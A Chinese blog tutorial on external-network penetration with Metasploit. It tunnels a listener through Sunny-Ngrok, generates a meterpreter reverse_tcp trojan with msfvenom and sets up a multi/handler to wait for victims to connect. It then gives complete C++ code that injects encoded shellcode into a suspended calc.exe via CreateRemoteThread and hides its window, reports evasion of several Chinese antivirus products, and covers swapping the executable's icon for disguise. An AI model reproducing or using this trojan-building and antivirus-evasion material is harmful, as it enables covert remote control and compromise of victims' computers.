MSF外网渗透+shellcode免杀

1. 内网穿透

使用的Sunny-Ngrok服务 。你在Sunny-Ngrok官网注册好后获得一条免费或付费的隧道,添加tcp通道,端口号自定。
官网链接:https://www.ngrok.cc/(Sunny-Ngrok服务 )
MSF外网渗透+shellcode免杀
在kali下安装Sunny-Ngrok的客户端,在该目录下启动Sunny-Ngrok。
MSF外网渗透+shellcode免杀
MSF外网渗透+shellcode免杀


2. 外网渗透

生成外网木马。注意这里的lhost和lport为赠送的域名和远程端口号:

msfvenom -p windows/meterpreter/reverse_tcp lhost=xxxxx.xxxx.com lport=10011 -f exe > test.exe

这里使用nat模式实现虚拟机内外网隔离:
MSF外网渗透+shellcode免杀
MSF外网渗透+shellcode免杀
设置监听。

msf5> use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.43.157
msf5 exploit(multi/handler) > set lport 12581
msf5 exploit(multi/handler) > run

MSF外网渗透+shellcode免杀
等待受害者主机上线
MSF外网渗透+shellcode免杀
外网渗透成功


3. shellcode免杀

主要有”分离“、”混淆“、”注入“和加载器执行等方式免杀。
参考文章:https://xz.aliyun.com/t/7170#toc-4(shellcode免杀总结)
这里使用的是注入方式免杀:
使用msfvenom生成外网木马的c版本shellcode:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 \b '\x00' lhost=xxxx.xxxx.com lport=10011 -f c

然后使用c语言起一个正常进程注入shellcode:

// 1018.cpp : Defines the entry point for the application.
//
#include "stdafx.h"
#include <Windows.h>
#include<stdio.h>
#include <tchar.h>
#include "iostream"
using namespace std;
    unsigned char shellcode[] =
    #(这里放shellcode)
     
BOOL injection()
{
    TCHAR Cappname[MAX_PATH] = { 0 };
    STARTUPINFO si;
    PROCESS_INFORMATION pi;
    LPVOID lpMalwareBaseAddr;
    LPVOID lpnewVictimBaseAddr;
    HANDLE hThread;
    DWORD dwExitCode;
    BOOL bRet = FALSE;

    lpMalwareBaseAddr = shellcode;

    GetSystemDirectory(Cappname, MAX_PATH);
    _tcscat(Cappname, "\\calc.exe");
    printf("Injection program Name:%S\r\n", Cappname);

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&pi, sizeof(pi));

    if (CreateProcess(Cappname, NULL, NULL, NULL,
        FALSE, CREATE_SUSPENDED
        , NULL, NULL, &si, &pi) == 0)
    {
        return bRet;
    }

    lpnewVictimBaseAddr = VirtualAllocEx(pi.hProcess
        , NULL, sizeof(shellcode) + 1, MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    if (lpnewVictimBaseAddr == NULL)
    {
        return bRet;
    }

    WriteProcessMemory(pi.hProcess, lpnewVictimBaseAddr,
        (LPVOID)lpMalwareBaseAddr, sizeof(shellcode) + 1, NULL);

    hThread = CreateRemoteThread(pi.hProcess, 0, 0,
        (LPTHREAD_START_ROUTINE)lpnewVictimBaseAddr, NULL, 0, NULL);

    WaitForSingleObject(pi.hThread, INFINITE);
    GetExitCodeProcess(pi.hProcess, &dwExitCode);
    TerminateProcess(pi.hProcess, 0);
    return bRet;
}

void help(char* proc)
{
    printf("%s:[-] \nstart a process and injection shellcode to memory\r\n", proc);
}

int main(int argc, char* argv[])
{
	HWND hwndDOS = GetForegroundWindow(); //得到前台窗口的句柄
	ShowWindow(hwndDOS, SW_HIDE); //隐藏窗口
    help(argv[0]);
    injection();
	return 0;
}

编译组建生成exe,验证360免杀:
MSF外网渗透+shellcode免杀
QQ安全管家免杀:
MSF外网渗透+shellcode免杀
火绒免杀:
MSF外网渗透+shellcode免杀
但是无法绕过win10微软防火墙。


4. 修改图标

在线.png转换.ico:https://www.img2go.com/zh/convert/png-to-ico
使用Resource Hacker软件修改exe图标,官网下载地址:http://www.angusj.com/resourcehacker/


参考链接:
https://www.fujieace.com/kali-linux/msf-extranet-intranet.html(msf外网渗透)
https://xz.aliyun.com/t/7170#toc-4(shellcode免杀总结)

上一篇:vc++反向连接后门


下一篇:leetcode 第44题 通配符匹配